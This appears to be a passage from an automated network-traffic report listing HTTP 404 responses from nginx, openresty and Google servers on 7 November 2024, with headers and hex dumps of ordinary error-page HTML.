0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 09:52:28 GMTContent-Type: text/htmlContent-Length: 167433Connection: closeETag: "652641ca-28e09"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 09:52:31 GMTContent-Type: text/htmlContent-Length: 167433Connection: closeETag: "652641ca-28e09"Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 20 50 61 67 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 09 62 75 74 74 6f 6e 2c 68 72 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 70 72 6f 67 72 65 73 73 2c 73 75 62 2c 73 75 70 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 20 6d 65 6e 75 2c 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 64 65 74 61 69 6c 73 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 3b 6d 61 72 67 69 6e 3a 2e 36 37 65 6d 20 30 7d 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c 6d 61 69 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 31 65 6d 20 34 30 70 78 7d 68 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 73 6b 69 70 3a 6f 62 6a 65 63 74 73 7d 61 3a 61 63 74 69 76 65 2c 61 3a 68 6f 76 65 72 7b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 30 7d 61 62 62 72 5b 74 69 74 6c 65 5d 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 7d 62 2c 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 65 72 7d 64 66 6e 7b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 7d 6d 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 09:52:33 GMTContent-Type: text/htmlContent-Length: 167433Connection: closeETag: "652641ca-28e09"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 09:52:41 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 09:52:49 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 09:52:55 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 09:52:58 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 09:53:01 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 09:53:03 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1718X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 